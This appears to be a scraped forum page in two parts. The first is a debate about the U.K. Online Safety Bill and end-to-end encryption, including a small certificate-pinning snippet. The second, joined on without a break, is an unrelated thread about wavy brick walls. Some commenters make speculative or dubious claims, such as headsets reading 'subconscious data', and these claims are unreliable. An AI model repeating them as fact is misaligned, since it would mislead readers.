U.K. lawmakers still have a chance to stop their nation from taking this shameful leap forward towards mass surveillance. End-to-end encryption was not fully considered and voted on during either committee or report stage in the House of Lords. The Lords can still add a simple amendment that would protect private messaging, and specify that end-to-end encryption won't be weakened or removed.
Earlier this month, EFF joined U.K. civil society groups and sent a briefing explaining our position to the House of Lords. The briefing explains the encryption-related problems with the current bill, and proposes the adoption of an amendment that will protect end-to-end encryption. If such an amendment is not adopted, those who pay the price will be "human rights defenders and journalists who rely on private messaging to do their jobs in hostile environments; and ... those who depend on privacy to be able to express themselves freely, like LGBTQ+ people."
It's a remarkable failure that the House of Lords has not even taken up a serious debate over protecting encryption and privacy, despite ample time to review every section of the bill.
TELL the U.K. Parliament: PROTECT Encryption—And our privacy
Finally, Parliament should reject this bill because universal scanning and surveillance is abhorrent to their own constituents. It is not what the British people want. A recent survey of U.K. citizens showed that 83% wanted the highest level of security and privacy available on messaging apps like Signal, WhatsApp, and Element.
Documents related to the U.K. Online Safety Bill:
Is this even enforceable? How can the UK government determine whether encrypted traffic going to/from UK IPs emanates from a messaging service as opposed to any other service?
This becomes a separate problem of against whom they choose to enforce it.
Defending yourself legally, no matter whether there's a lot or a little evidence, is an expensive, stressful, drawn out exercise.
Sometimes the accusation is the punishment.
>Is this even enforceable?
Not really; people have been talking in code for millennia. I wouldn't be surprised if a car company like Mercedes or Volkswagen could use their vehicles like swarm drones, relaying information between them when passing on the road, which could get data out of the UK using the cross-channel ferries and Eurotunnel.
There's way too much movement of people and stuff in order to secure anything, really. Even the new Apple headset can read the iris of the eye to get subconscious data out of the user when exposed to AV data, and users won't even know they are giving out this data. Privacy? We don't have any!
Clandestine communications in cyber-denied environments Numbers stations and radio in the 21st century https://www.tandfonline.com/doi/full/10.1080/18335330.2023.2...
Number Stations https://www.youtube.com/@RingwayManchester
'Who denounced you?' said Winston. 'It was my little daughter,' said Parsons with a sort of doleful pride. 'She saw the installed encryption programs, and nipped off to the patrols the very next day. Pretty smart for a nipper of seven, eh? I don't bear her any grudge for it. In fact, I'm proud of her. It shows I brought her up in the right spirit, anyway.'
> Is this even enforceable?
They'll consider it enforced if all the major companies comply.
In terms of actually having the criminals using software that complies with the law, absolutely not. Making your own program that doesn't comply isn't much of a challenge.
The UK Government repeatedly fails to understand that there are no boarders on the internet, and it'd be impossible to impose any without the kind of extreme restrictions of a totalitarian regime.
Any measures without broad international cooperation will push vast number of people towards darker corners of the internet, which will not just end up completely undermining what they are trying to achieve, it will make the problems worse.
Meta alone has the power to make this law a miserable failure. People will want to use WhatsApp; the government themselves use it extensively. If Meta refuses, there is very little they can do. Facebook can continue to operate without a single person on the ground in the UK. It might harm their business in some ways, but it's definitely doable. The government might be able to force/convince Apple and Google to take it out of their app stores in the UK, but such regional restrictions are easily bypassed, and WhatsApp is popular enough to make people try. That would then normalise practices such as sideloading, jailbreaking and avoiding regional restrictions. Cyber criminals would be rubbing their hands at the opportunities this creates, and I am sure the paedos and terrorists this is meant to be stopping will jump at the chance to get in on the act.
> If meta refuses there is very little they can do. Facebook can continue to operate without a single person on the ground in UK
If it came to it, Whatsapp could be blocked at the network level. All the gov need to do is impose regulations that forbid ISPs and other infrastructure hosts to carry the traffic.
The international network we used to know has been destroyed. It is fracturing into smaller regional networks with heavy filtering at the borders as countries seek to impose their little laws on it.
I'm glad I was able to experience the true internet while it lasted. Truly a wonder of this world.
Ever been to China? The internet certainly has borders and boundaries. Sometimes you can sneak across or get a visa, but individual nations make their own rules. Most people either follow them or remain unaware of them, and large multinational companies will typically follow local laws because they are juicy targets.
In the UK, companies which protest this law are threatening to leave the market. That would mean blocking UK users on their properties, not helping them find ways to break the law.
Or, when you say 'no boarders,' do you mean that the internet is not zoned for residential use? Sorry if I misunderstood.
>The UK Government repeatedly fails to understand that there are no boarders on the internet
Don't know what universe or timeline you're from, but on this earth today, the internet definitely has borders.
That's why we have those EU cookie banners and GDPR consent forms, and why some of my favorite piracy websites are blocked by all ISPs in my country, or why I can't watch Top Gear on BBC's website because I'm not from the UK, or why Facebook had to remove some politically spicy content worldwide because the courts where I live forced them to, etc, etc.
Mainstream web companies have to conform to local laws in each country or they'll get fined or blocked. Sure, there's VPNs to circumvent that, but the days of the lawless and borderless internet are a thing of the past.
Legislators, courts and bureaucrats (in this order) always fail to grasp such things. It's an idea that erodes their jurisdiction and authority, and is abhorrent to their ethos.
No borders (from their POV) puts internet businesses above the law... which it sort of does. The global village happened, but global authority did not. There are no clean resolutions to some of these tensions.
I see no failure to understand. The UK is a pragmatic imperial power, not a collaborative, cooperative peer. They built Empire upon the asymmetric application of technology. When it was time to surrender Empire, they did so. When it was time to build a Financial Empire, they did so. When the time comes to build an Internet Empire, I'm sure they will do that too, by applying whatever technology they have at hand.
>The UK Government repeatedly fails to understand that there are no boarders on the internet, and it'd be impossible to impose any without the kind of extreme restrictions of a totalitarian regime.
Why would the latter stop them? They have no problem with these.
>Any measures without broad international cooperation
Don't worry, other governments are just as shitty and want the same BS.
Even with a totalitarian regime, they cannot stop the rest of the world from using encryption. People can pull their business entities out of the UK and they have no jurisdiction outside their borders.
If I create an E2E messaging app, I don't need to listen to the UK at all. The UK can't tell me what to do any more than China can. China can block my app if they want, but it's on them, not me, to block it. Same goes for the UK. They can set up a firewall too if they want. But I don't need to change my app if I don't set foot in the UK.
> The government might be able to force/convince Apple and Google to take it out of their app stores in the UK
Apple has even threatened to withdraw their own systems from the UK rather than comply with this.
https://9to5mac.com/2023/07/20/apple-imessage-facetime-remov...
I think it's dangerous to assume they fail to understand. These are smart people with good advisors. They just want to do it anyway. Which puts them in the category of evil.
Who would you rather be in the public eye, evil or stupid?
>The UK Government repeatedly fails to understand ... impossible to impose
Yeah but it's never worried them much in the past. As a Brit I occasionally come across the effects of them requiring ISPs to block piracy sites. Something comes up saying 'this site is blocked' so you click like one or two buttons to switch to a different connection or turn a VPN on (VeePN is good and free). I imagine their encryption ban will be similarly tricky to avoid. I think it's more about looking noble to the electors than actually achieving anything.
It's not impossible. The pandemic showed that you don't need a Hitler or Stalin figure to be ruled with an iron fist. The oligarchy could just make the pro encryption people the new ivermectin.
I think a large majority of the 'non technical' population would have no clue how to sideload apps, or even that it was possible, and that the more likely result of WhatsApp being withdrawn from the UK would be massive screaming from the public of such intensity and wrath that the government would be forced to backtrack.
To fully implement this would require dismantling vast amounts of software and protocols including VPNs, SSL/TLS, SSH, WebRTC, and loads more. Other countries won't want these protocols weakened just for the UK. It would end with the UK having a 'great firewall' and basically its own little Internet with tech-savvy people punching holes in it just like they do in China.
Hopefully the role of the UK is:
Mistakes: It could be that the purpose of your life is only to serve as a warning to others.
as others have said, it's not going to affect the rest of the world, the UK will just lose access to services.
as a UK resident, i can safely say that we aren't going to do a single thing to stop this and we wholeheartedly deserve this and everything else the government does to strip away our rights. we are a nation of spineless cowards, do not feel bad for a single one of us.
the opposition not only wants this to become law, they are accusing the government of watering it down and not moving fast enough.
same for NGOs. they want the government to go even further.
various members of the public have come forward accusing the government of not doing enough to protect them from the perils of the internet (there were a few tragic cases, as is always the case).
basically, everyone wants this, and wants it sooner and strengthened.
I wish it would affect the rest of the world, so everyone else could at least give our government a well-deserved kicking. I've not checked, but I doubt that Sir Keir's Labour will reverse this dreadful bill; if they do, that will be welcome.
'They' seem to be using the standard playbook of the rich and/or powerful against the will of the people: if they fail, keep trying and trying and trying until they get their way.
Well if the UK and other countries pass this, I guess it is back to gnupg. No way can that be restricted at this point.
> against the will of the people
it is not against the will of the people.
the opposition, NGO's and the general public are accusing the government of moving too slowly and watering down the law. they want the law strengthened and adopted faster.
Would this Online Safety Bill have protected Julian Assange from being imprisoned by a foreign totalitarian regime?
No. There's nothing that would have stopped that. If the US wants to make an example of someone, laws don't stop them.
Nice thought eh?
Doesn't help that Australia has done sweet FA to help one of its citizens. Weak as piss.
Everybody was fine using non-e2ee messaging for like 2 decades before whatsapp and competitors implemented it.
So why is it now so important, when since the early 90s everyone was totally happy to communicate without it?
Other people listening in on private conversations hasn't been 'fine' since the first private conversation. It wasn't okay in the 90s and it isn't okay now. More people are aware now so more people are asking about it, which is making it seem more important, but it's always been important.
We don't use telnet anymore, we use SSH, and for good reason. That people that have never heard of ssh have the same demands for their communications shouldn't surprise you.
If you really don't understand why, look into a guy named Edward Snowden.
Stupid question maybe, but could certificate signing keys already be in government hands via backdoor (physical) handshakes/greased palms?
If this is the case, then you have to ask, why is this bill even needed?
A government would still have to make and use its own keys in a man-in-the-middle attack. A forged key means that if anyone bothers to check, it will be detected, and there are also various ways that an application can pin the expected key to make this impossible. A man-in-the-middle attack requires a lot of control over the infrastructure; for something that works reliably they would need to cooperate heavily with telcos and spend a good deal of money.
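To make the 'pinning' point concrete: the usual way an application locks the expected key is certificate (or public-key) pinning, where the client ships with a known fingerprint and refuses any server whose certificate hashes to something else, so even a validly signed forged certificate is rejected. A minimal sketch in Python; the host and the pinned fingerprint below are placeholders, and real apps generally pin the SPKI hash rather than the whole certificate:

import hashlib
import ssl

# Placeholder values for illustration only.
HOST = 'example.com'
PINNED_SHA256 = '<hex sha-256 of the expected certificate>'

def certificate_matches_pin(host: str, port: int = 443) -> bool:
    # Fetch the server's leaf certificate (PEM) and hash it.
    pem = ssl.get_server_certificate((host, port))
    fingerprint = hashlib.sha256(pem.encode('ascii')).hexdigest()
    # A man-in-the-middle presenting a different certificate - even one
    # validly signed by a coerced CA - produces a different fingerprint.
    return fingerprint == PINNED_SHA256

print('pin ok' if certificate_matches_pin(HOST) else 'possible MITM - refuse to connect')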
That's a very bold claim, any evidence you can provide to support it? How do the governments sidestep Certificate Transparency, which makes the simple possession of the signing keys ineffective? And have there ever been reports of developers observing these rogue certificates in the wild?
[flagged]
The excess death rates between anti-vaxers and the vaccinated show that, in fact, the experts had it right all along.
Similarly here, experts are pushing to maintain encryption for the sake of public safety. Weird you think your two examples cast doubt on expertise.
Governments have always tried to maintain power through breaking secrets. But there's no evidence governments tried to do anything but vaccinate and protect their populations from COVID. How was any of that a power play? What irony?
[flagged]
why don't you save us all a bit of time and just go ahead and tell us exactly which rights we're allowed to have in order to protect the children in your perfect kingdom?
like, will you allow me to drive a car, or eat beef, or own a kitchen knife?
Nice username :)
I'm on the other side. IMO, CP is used more and more as an excuse to push an anti-privacy agenda, because it is difficult to argue against 'We want to protect children'. That framing moves the discussion to a place where it is difficult to argue at all. Why can't we have both? Is eliminating privacy the only way to prevent CP?
This begs the question of there being a 'scourge' of child porn and terrorist propaganda. You're also assuming the UK's attack on encryption would do anything at all to combat either thing let alone end the presumed 'scourge'.
Strong encryption is the foundation of pretty much all online commerce. Without it little else is practical online. It's not up to the EFF to come up with solutions to made up or exaggerated issues.
Your right to hunt down child porn does not exceed my right to privacy. To have it otherwise is to live in a panopticon.
Your comment is made in bad faith. Notably, you posted from a brand new account echoing the most inflammatory talking points that the government uses in support of eroding encryption. Either this is some blatant (and bad) astroturfing, or you've drunk the kool-aid from the government.
Nobody is here to defend child pornography or terrorism. But even accepting that they exist, those are a drop in the literal ocean of use cases for encryption relative to the overwhelmingly legal and productive and often necessary uses.
> They should come up with a useful alternative
We have a useful alternative - criminal laws. Make the criminal penalty a strong enough deterrent and you'll stop everyone except the most craven malfeasors (and those people will find ways to continue to disseminate their materials irrespective of encryption status).
Rather than accuse privacy supporters of being 'stubborn', you should come up with a legitimate argument why ordinary, law abiding people should have to sacrifice their autonomy in service of an effectively phantom boogeyman.
They're telling us it's a scourge.
But I suspect it's a relatively tiny, albeit terrible, problem compared to breaking encryption, which isn't just about privacy but about every action over the internet.
I don't see that you can have it both ways: secure encryption and being able to inspect traffic. There's no alternative, so it's either using other mechanisms to go after CSE and terrorist material, as currently happens (which is how we know about the scourge at all), or we may as well revert to everything being on plain HTTP.
How does this differ from the access and assistance bill in Australia?
While it's super illegal for anyone to talk about, literally none of the actions that were going to be taken (Atlassian threatened to move overseas and stop servicing Oz; Apple/Facebook/Google all rattled sabres) eventuated. We can only assume that the backdoors have been delivered on time without complaint.
Is it really considered a 'backdoor' for one party to willingly hand over the data that was exchanged through an encrypted channel? I'm not sure what you mean.
I honestly hate my current government with all my heart.
Let this series of badly-thought-out bills be destroyed in the courts once the courts find that reality bats last.
There's probably a clause in there that decrees Pi must be four from now on.
> Let this series of badly-thought-out bills be destroyed in the courts once the courts find that reality bats last.
How? I thought the UK courts can't override Acts of Parliament, because the courts are subordinate to it (unlike in the US).
It's not just the current government, the whole of Parliament including the various committees are eager to just go along with the intelligence and security agencies who tell them encryption is bad.
Your 'current' government has been in power for well over 10 years.
Is this legislation likely to land? I mean, I'd expect all relevant vendors to drop the UK rather than pick up so much liability and be expected to carry it worldwide.
Apple told the US to suck lemons; why would it kowtow to the UK?
It's a desperate lame-duck government, heading for an electoral wipeout of historic proportions - all bets are off.
Could you imagine if the UK was just... cut off from the rest of the western internet?
What a time to be alive.
zero chance. did anything happen in australia after they passed a very similar law? nope.
https://fee.org/articles/australia-s-unprecedented-encryptio...
I hope that will be the response. I wish the same had happened when the EU passed the stupid cookie law. Everyone should have replaced their websites with a static page that explains browser cookie settings when accessed from Europe.
Maybe when it was part of the EU it mattered what the UK did, but now it does not seem important enough to dictate things on a global scale. Not trying to put it down, but do people worry about how Estonia's laws will affect the rest of the world? Nobody cares, because you are just not a big enough market to matter.
I'd agree with you but all governments think alike and I'm sure this will reach the EU and the states (with whatever excuse they can think of)
This is uber stupid, because it will create a far more divided internet (all countries will start separating further) and a loss of trust in Western/UK/US products (why would the rest of the world continue to use iPhones/MacBooks, Google, Amazon, etc.?), so it will have a huge cost in lost revenue for all the big companies. On the other hand, there are smarter ways to do what is needed that respect privacy and do not cause such unnecessary economic harm, but hey, we'd need smart people in government (which is full of not-smart people). Another aspect is that this will be unenforceable for the huge majority of individuals, since there will be plenty of ways to circumvent it; plus, companies will start incorporating in unaffected geographies (offshore, etc.) and providing alternatives to Viber/Skype/Google/etc. (some already exist).
> it will create way more divided internet (all countries will start separating further)
IMHO that's the future.
Funny thing is, this doesn't hurt criminals at all. If you're doing serious crime, you bring your own encryption. There are cartels that spend a lot of money rolling their own crypto.
In the UK we have a huge problem with children sending hateful communications online which cause anxiety and distress. As it stands we can only arrest children who are doing this in public but banning encryption should give authorities more power to arrest children who are committing these crimes in private (eg on WhatsApp).
The list of hate crimes being committed online really is endless, and these are just the criminals doing it in public:
https://news.sky.com/story/teenager-jailed-for-sending-racis... https://www.bbc.co.uk/news/uk-england-merseyside-4381692 https://www.bbc.co.uk/news/uk-england-tyne-52877886
Heck, they roll their own infra. Billions in cash buys a lot of tech.
https://www.reuters.com/article/us-mexico-telecoms-cartels-s...
> gives the British government the ability to force backdoors into messaging services
This is NOT enforceable outside the UK any more than Chinese law enforceable outside China. If you are a messaging service, just close all your business entities in the UK and they have no more jurisdiction over you. People in the UK can still use your messaging services unless the UK decides to implement a firewall like China.
> which will destroy end-to-end encryption
I don't trust any E2E encryption unless at least the clients are open source. How do I know the NSA hasn't inserted a backdoor into WhatsApp?
And then if the clients are open source, the back doors they insert (via git pull requests?) can be removed.
Or they can just scrape screens, so it does not matter whether your encryption is 'trusted'.
I run an encrypted XMPP server for about a dozen people. It's completely ephemeral in the sense that the server stores no messages. If you're offline, you miss them, kind of like IRC.
Will this apply to me? Do I need to ensure that no UK users are on my server?
I never anticipated this back when I set up the server. I thought that implementing strong security and privacy measures was a responsibility that I should take seriously.
I wouldn't be willing to run the server if I had to compromise people's privacy. If you don't have privacy, you might as well be on a mega-corp service.
The UK is an island, physically and metaphorically. It can dig its (financial) grave if it wants to, the rest of the world won't really care much.
The headline is false.
Indeed. The article itself doesn't explain why this will affect the rest of the world. In fact, Apple has said they would consider withdrawing FaceTime and iMessage in the UK if this law goes ahead, so I think it is unlikely it will affect the rest of the world. Either the UK will be left with fewer encrypted products, or they will do a u-turn.
https://www.theguardian.com/technology/2023/jul/20/uk-survei...
The UK is a number of islands.
The main one being Great Britain, plus a chunk of Ireland. There are then a number of smaller islands around the English, Welsh, and Scottish parts of Great Britain.
The rest of the world is taking notes. They're trying to push something similar through in the EU. The US has at least 2 or 3 bills active right now that would have similar effects.
I hope all the intelligent people eventually move away from those authoritarian governments' countries, moving all the brainpower away from serving their economies.
I'm a UK resident not opposed to this bill.
First, child protection is paramount.
Second, the erosion of big tech companies' power is a benefit as far as I can see.
Third, we still have effective encryption in our hands. TLS is not going to be broken by this.
The argument that offenders will be pushed into darker corners of the internet is probably true, though I expect that will make it easier for law enforcement - take ANOM [1] as an example.
The battle I'd fight would be some kind of accountability in intelligence services.
what does a black market on encrypted comms look like? if they can't read your communication logs you go to jail?
There's already a crime of refusing to provide a password, with a maximum sentence of two years' imprisonment, or five years in cases involving national security or child indecency.
https://www.saunders.co.uk/news/prosecuted-for-your-password...
I see a few comments suggesting a change of government will help.
The previous Labour government (1997-2010) introduced the Regulation of Investigatory Powers Act 2000 (https://en.m.wikipedia.org/wiki/Regulation_of_Investigatory_...), which amongst other provisions includes key disclosure rules (https://en.m.wikipedia.org/wiki/Key_disclosure_law#United_Ki...). The burden of proof in key disclosure is inverted (the accused must prove non-possession of the key or inability to decrypt), which was somewhat controversial amongst people who cared at the time (activation, i.e. actual use of the RIPA Part III provisions, began in 2007).
The same Labour Government ran the Interception Modernisation Programme (https://en.m.wikipedia.org/wiki/Interception_Modernisation_P...) (you may recognise this or 'mastering the internet' from the Snowden leaks, although IMP was not a secret) and proposed legislation to enact part of it: https://en.m.wikipedia.org/wiki/Communications_Data_Bill_200.... This never made it into law.
I think Labour are on board with this, and the senior civil service (those at the top levels who work with ministers or close to those who do) don't change in the same way US administrations do. It might be the case that this bill runs out of time in the current parliament and is not picked up by the next government (this can happen even if the same political party holds office) but the idea will be back in some form one way or another and I suspect will make it into law.
Given that Labour also have not committed to reverting the anti-protest laws that were brought in by Suella Braverman, and that the Deputy Leader of the Opposition said something along the lines of 'now is not the time to review that' when a caller literally asked that question, I don't hold out much hope for them doing anything progressive in relation to this.
It's not made clear how the UK Gov would erode encryption worldwide
Seems like they'll only be stuck with their own police state friendly system.
People on the other end of encrypted conversations outside of the UK would also be surveilled.
More broadly, any backdoor built into any app can and will be exploited by bad actors. There's no 'safe' way to break end-to-end encryption for just the 'good guys'.
It will absolutely erode encryption in my country. Our government seems to operate on the following logic:
1. We want to be a developed country.
2. X is a developed country.
3. X does Y.
4. Therefore, we must also do Y.
We have our own GDPR. I've seen judges citing European laws in decisions. Watching other countries pass laws like this one is like getting a glimpse into the future.
I wonder what twisted shit the tories are looking at online. We already know they watch porn in the commons. By eroding encryption we'll soon be seeing what they look at in the privacy of their own homes.
Because Labour would never. You think this will go away when Labour get in?
This nation gave us the first mechanical computer, the first programming language, Alan Turing, the first digital computer, broke the Enigma encryption, and the World Wide Web... and now, this.
> broke the Enigma encryption
Poland?
> and the World Wide Web
CERN is a country?
If you live in the UK, then please go to the UK Government and Parliament website and sign your name on this petition: https://petition.parliament.uk/petitions/634725
It's currently at 6,327 signatures; it needs 3,673 more for the government to respond and 90,000 more after that for a debate to be considered.
This is interesting: 6k signatures (and just the one petition, with no duplicates, when searching) seems very low. I suspect there isn't a huge amount of knowledge in the Facebook-mass-share spheres that usually kick these petitions into the big numbers.
Writing to your MP (don't use a template) would be more effective. I have yet to see a single one of those petitions that resulted in anything more than a brush off. Even much more popular ones.
Letters to MPs almost always result in a brush-off too but they do take notice of them at least. Very occasionally you do get a non-template response too.
I'm curious how many companies will just block the UK rather than comply. It's definitely not going to be zero.
Do they even have to block UK users?
Can't they just remove any business presence in the country to free themselves from any potential legal troubles?
The whole thing will fail once they realise how impossible this is to implement.
Let me guess, to protect the children and the rest of us from terrorists?
You know bad actors won't care about your bill, I would love to see how the government is going to block an email encrypted with gpg?
> to protect the children and the rest of us from terrorists
Don't forget the pedophiles.
i guess this thread is a great example of how different the HN crowd is to the rest of the population. i keep seeing the same type of comments for every article where encryption is threatened.
to me it looks like the direction of policy in the world when it comes to the internet is pretty clear: the internet needs to be brought to heel. it needs to respect local laws, it can't be a black box, we can't rely on foreign/american companies to moderate.
this direction is coming mainly from voters. they feel disenfranchised from the big internet companies, they feel threatened, the internet still feels like a dangerous place. and to be fair, there are so many crimes enabled by the internet, some of them violent.
and so the public and the NGO's make enough noise so that politicians take stock and start doing something about it.
this law is not the first law in the world to force internet companies to better moderate their content. and it won't be the last.
but if HN folk want to change people's view around this issue then they need to step out of this bubble and engage with people's concerns.
because this direction of travel has been set for a while now. and it won't change anytime soon.
what's going to happen with this law? nothing special. it will be adopted, and there will be no consequences. just like all the other countries that did the same.
disclaimer: i've been on the internet since there were ~10 websites. that wild west stuff was amazing when growing up. but the cat is now out of the bag.
There was even pushback on HN to Apple's communication safety feature which would warn kids about nude photos. No big brother, not even CSAM matching. Just locally run nudity detection in a reasonable, even minimal effort to address some harm to kids.
Comments wailed about the invasion of privacy, thin end of the wedge/normalisation of scanning etc. without any mention of the problem this tries to address.
Personally I still think the risk of encryption to children is outweighed by the risk of permanent, incontestable authoritarian regimes (in which kids aren't safe either). But effectively arguing this requires acknowledgement of the other side's concerns.
As you say, most people prioritise child safety over privacy, so these bills are going to keep happening until the rest of us make our case, acknowledge the problem and help find solutions.
But I disagree there will be no domestic consequences for this law. The UK is the home of the coverup and this places even more power in the hands of a barely accountable old boys club. It should still be opposed, but privacy activists need to better make the case why.
We could outlaw math. Or the police could start doing their job.
https://www.newscientist.com/article/2140747-laws-of-mathema...
Australia tried that. This must be resisted wherever it appears.
>We could outlaw math.
Maybe that's why math education is being sabotaged.
I think they'd argue that this is them doing their job: trying to negate the advantages that sophisticated criminals have over law enforcement efforts.
Could you elaborate on what you see as 'doing their job' in this context?
That would require the UK government to fund the police properly. And the courts. And the judiciary. And the prisons.
For a political party that likes the cliché 'tough on crime', it's kinda surprising how far on the path to accidental anarchy they are.
The police can do legal wiretaps because it is a tremendous help to get the job done.
That's the problem with e2e encryption: it makes the police's job much, much more difficult.
That's the point. People have to realise that there is a real issue which does not have a simple solution.
They already are. They imprison journalists under terrorism acts if they criticise the government, or they come knocking on your door if you put mean things on Twitter.
But corrupt politicians? That's not a bug, it's a feature.
I wrote this about 6 years ago when the then PM was trying to do the same thing - http://coding2learn.org/blog/2017/06/11/dear-theresa/
Yeah well I have an AR-15 try to take my BSD and OpenSSL away bitch I dare you.
Could you please stop posting unsubstantive comments and flamebait? You've unfortunately been doing it repeatedly. It's not what this site is for, and destroys what it is for.
If you'd please review https://news.ycombinator.com/newsguidelines.html and stick to the rules when posting here, we'd appreciate it.
Most sieges don't tend to end well for the person inside the building.
To break, just for a moment, from parroting the party line that E2E encryption is a human right: does anyone else experience the same fatigue with communities on encrypted platforms? I've never found a good community on Tor, everyone on Signal seems to become a shadier version of their public selves, and Telegram seems to be full of smut.
However I believe this is due to my small social circle. Does anyone with better social skills (any at all) have a more positive experience with E2E platforms? Please help me out because I want to believe. I believe it's important for people to speak freely but I'm having trouble reconciling that with how nasty they become.
I don't see how E2EE services affect people's behaviour.
Anonymity does though.
WhatsApp is end to end encrypted, this has been proven in actual court in my country. Everyone here uses it for everything every day. Never before have so many people used something that is this secure by default.
> Telegram seems it's all full of smut
Telegram is not E2EE.
(Unless you use secret chats, which hardly anyone does.)
For context, this is a cross-party policy designed in committee.
Yes, both parties are that bad.
The dumbest thing about this is that you create a single attack vector for nation-state enemies, who we now know all have the facilities to exploit it.
You might as well just turn the lights off and hand Russia, China, Iran, N. Korea the keys.
> Yes, both parties are that bad.
If I read this correctly (https://en.wikipedia.org/wiki/List_of_political_parties_in_t...) there are twelve parties in Westminster
Still, an early general election would put the brakes on this bill. The next Labour government will be under no pressure to pick it back up, and in fact will likely be under quite a bit of pressure to let it go.
This is the sort of terrible throwaway law that results from lame-duck governments.
I hate our government but the media has a massive part to play in propping them up.
All the tech companies should stand together and be ready to block access to their services. Imagine if the UK was left without access to just WhatsApp, let alone iMessage etc. It's not irresponsible or unsafe; there's always SMS, over which the government has full control.
Also, I don't think any of these companies should fear competitors. Why? These services are so ingrained that a few weeks, if not months, of protest will not change anything. When the government finally succumbs, restoration will be easy and the numbers will go back to normal quickly.
Agree - a UK without WhatsApp would be a UK in revolt. Literally everyone I know from teens to oldies organises their lives on it. Lack of WhatsApp would be enough to drag our sorry apathetic lazy non-protesting arses out onto the street
I watched an interview with David Yelland, former editor of the Sun, recently where he said that the news media in the UK is more or less run by the same minority class of people who typically work as spads[1]. That would follow your point that the media props them up, because it is a homogenous and tight knit community now between media and politics.
[1] https://www.theguardian.com/politics/2015/apr/19/spads-speci...
635 points 5 days ago by caiobegotti in 543rd position
twistedsifter.com | Estimated reading time – 2 minutes | comments | anchor
How cool is this! Popularized in England, these wavy walls actually use less bricks than a straight wall because they can be made just one brick thin, while a straight wall—without buttresses—would easily topple over.
According to Wikipedia, these wavy walls are also known as: crinkle crankle walls, crinkum crankum walls, serpentine walls, or ribbon walls. The alternate convex and concave curves in the wall provide stability and help it to resist lateral forces. [source]
The county of Suffolk seems to be home to countless examples of these crinkle crankle walls. On freston.net you can find 100 wavy walls that have been documented and photographed. In the United States, the best known serpentine wall can be found at the University of Virginia where Thomas Jefferson incorporated the wavy walls into the architecture. Although some authorities claim that Jefferson invented this design, he was merely adapting a well-established English style of construction. [source]
As for the mathematics behind these serpentine walls and why the waves make them more resistant to horizontal forces like wind vs straight walls, check out this post by John D. Cook.
Below you will find additional examples of these intriguing wavy walls that lawnmowers surely detest!
[h/t smell1s on reddit]
> As for the mathematics behind these serpentine walls and why the waves make them more resistant to horizontal forces like wind vs straight walls, check out this post by John D. Cook.
The linked post does not explain why the walls are more resistant to forces. It just calculates the difference in length.
Did my adblocker accidentally filter out the explanation?
Following the link that is supposed to explain the other thing (why it is more resistant to lateral forces), it does contain an explanation:
> The parameter a is the amplitude of the sine wave. If a = 0, we have a flat wave, i.e. a straight wall, and so the length of this segment is 2π = 6.2832. If a = 1, the integral is 7.6404. So a section of wall is 22% longer, but uses 50% less material per unit length as a wall two bricks thick.
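That 22% figure is easy to sanity-check numerically. A quick sketch with numpy, integrating the arc-length formula for y = a·sin(x) over one period (the brick counts per unit length follow directly from the ratio):

import numpy as np

def sine_wall_length(a: float, n: int = 100_000) -> float:
    # Arc length of y = a*sin(x) over one period [0, 2*pi]:
    # L = integral of sqrt(1 + (a*cos(x))**2) dx
    x = np.linspace(0.0, 2.0 * np.pi, n)
    return float(np.trapz(np.sqrt(1.0 + (a * np.cos(x)) ** 2), x))

straight = 2.0 * np.pi           # a = 0: a straight wall, length 6.2832
wavy = sine_wall_length(1.0)     # a = 1: about 7.6404
print(wavy, wavy / straight)     # ~7.64, i.e. ~22% longer than the straight run

So a one-brick wavy wall uses roughly 1.22x the bricks per unit length of a one-brick straight wall, versus 2x for the two-brick-thick straight wall it replaces.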
'as a wall two bricks thick'. Hmmm. Even bigger savings as a wall three bricks thick.
The point is that a straight wall one brick thick will fall down.
Though I didn't see any real explanation of why a straight wall one brick thick will fall down...
I believe I've read that some plants do better when planted in the concave portion of a wavy wall, because the bricks absorb warmth during the day and release it at night.
Not sure about the actual function that defines the wave, but let's assume they are convex and concave semi circles. Then to make a wall of length L with bricks of l length, we need piL/l number of bricks. The linked Reddit post says a straight wall needs to be 2 bricks wide to have the same length, which needs 2L/l number of bricks which is fewer than the wavy walls
It's not one giant semicircle. Let's say each semicircle has a radius of about 2 ft (judging by the pictures). Every 8 ft section (one wave / one full circle) takes 2π × 2 ≈ 12.57 ft of brick, while the straight wall takes 8 × 2 = 16.
Semicircles seem excessive. At no point does the wall sit at an angle over 45 degrees, so a semicircle, which would be at a 90-degree angle at every inflection point, seems way too wavy.
A sine wave is probably closer, which would give an arc-length integrand of sqrt(1 + cos(2πx/L)^2). This has no reasonable closed form I can find, but it seems like it would be about 21% longer than a straight line.
Edit: Also a semicircle is pi/2 times as long as its diameter, not pi times.
Article links to this post with another derivation.
https://www.johndcook.com/blog/2019/11/19/crinkle-crankle-ca...
I'd like to know if this wavy wall technique requires non-square bricks to be stronger. And is it stronger against sideways forces along the concave and convex sections? If it's only the same strength as a straight wall, then I'd think it'd be worse as a retaining wall.
Soda cans also have a counterintuitive efficiency feature: concave bottoms. If a can with a flat bottom held the same amount of soda, it would be shorter and have less surface area, but its metal body would need to be thicker to withstand the same pressure. In the end, it'd require more aluminum.
https://www.csmonitor.com/Science/Science-Notebook/2015/0414...
^Probably not the best article for this, but it was easy to find and has a link to a chemical engineer's video.
Same principle as concave bottoms on wine bottles (though the concern there is more about jostling and impact during transport than pressurized contents).
I think the Christian Science Monitor is perfectly fine. https://mediabiasfactcheck.com/christian-science-monitor/
Aluminium's also more expensive than steel but experiences sufficiently less breakage to justify the price.
Engineer Guy (Bill Hammack) has a great video about this.
https://www.youtube.com/watch?v=hUhisi2FBuw
Edit: Just realized this is the same video you referenced. All of his work is fantastic.
Also in the current design you can stack them. This is probably worth something in terms of wrapping of pallets of cans.
Standard video:
'The Ingenious Design of the Aluminum Beverage Can'
https://chbe.illinois.edu/news/stories/engineer-guy-ingeniou...
Same with cans: corrugated sides, tops and bottoms are for strength and pressure resistance. Actually, most corrugation of anything is done for strength.
I think that's also why a pretty small kink in the can will make it tremendously easier to crush against your forehead as a party trick :-)
Or, more likely, it's a similar principle also at place in the design.
Same about waviness on plastic bottles.
https://www.riverkeeper.org/wp-content/uploads/2018/04/bottl...
Corrugated cardboard just is a wavy wall, sandwiched in between two straight walls.
You can also observe corrugated steel and its use in construction, shipping containers, etc. Because these are steel and stronger than paper, the sandwich layers are not needed
You can also peel the label off a tin (can) of baked beans in your cupboard to see the ripples added for rigidity.
Car floor tunnels serve the same purpose. Increase rigidity at low material cost.
If it wasn't for fashion, it would probably be the most popular material for roofs. Make your roof out of it, at an angle, and you'll probably never worry about leaks for decades.
